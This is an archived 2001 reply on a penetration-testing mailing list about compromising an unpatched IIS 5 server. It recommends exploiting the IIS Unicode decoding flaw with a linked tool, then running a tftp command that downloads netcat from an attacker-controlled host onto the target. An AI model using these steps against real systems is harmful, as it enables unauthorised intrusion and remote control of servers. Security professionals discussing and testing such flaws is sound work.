Penetration Testing mailing list archives
RE: pen testing iis 5
From: dilbert96 () hushmail com
Date: Sat, 23 Jun 2001 10:05:51 +0000 (PDT)
Hi, In most cases I find the easiest way to upload files is tftp. There are loads of tftp server programs however I recommend tftpd32 (attached). use Unicode or escaped characters decoding vulnerability http://www.sec-1.com/iisenc.zip and use tftp.exe -i tftp.ip.addr GET nc.exe nc.exe With iisenc.pl use cmd /c> \\ Enter alternative command e.g. net.exe, tftp.exe >tftp.exe tftp.exe>-i tftp.ip.addr GET nc.exe nc.exe Regards Gary O'leary-Steele
-----Original Message-----
Greetings. I am pen-testing IIS 5 [no hotfixes] running in
WinNT 4.0
with no fixes. At this point I want to upload a file to the box
[nc.exe] and then I will
definately have the box. How can I go about doing
this?
Free, encrypted, secure Web-based email at www.hushmail.com
Current thread:
- pen testing iis 5 ExpLiciT (Jun 21)
- Re: pen testing iis suntzu (Jun 24)
- Re: pen testing iis Enrique A. Sanchez Montellano (Jun 27)
- Re: pen testing iis Javier Fernandez-Sanguino Peña (Jun 28)
- Re: pen testing iis Enrique A. Sanchez Montellano (Jun 27)
- Re: pen testing iis 5 Javier Fernandez-Sanguino Peña (Jun 27)
- <Possible follow-ups>
- Re: pen testing iis 5 Stephen Friedl (Jun 22)
- Re: pen testing iis 5 Reverend Lola (Jun 22)
- RE: pen testing iis 5 dilbert96 (Jun 24)
- RE: pen testing iis 5 st0ff st0ff (Jun 25)
- Pen Testing a Oracle database. How to pull data? Osvaldo J . Filho (Jun 26)
- RE: Pen Testing a Oracle database. How to pull data? Aaron C. Newman (Jun 26)
- RE: Pen Testing a Oracle database. How to pull data? George Milliken (Jun 26)
- Pen Testing a Oracle database. How to pull data? Osvaldo J . Filho (Jun 26)
- Re: pen testing iis suntzu (Jun 24)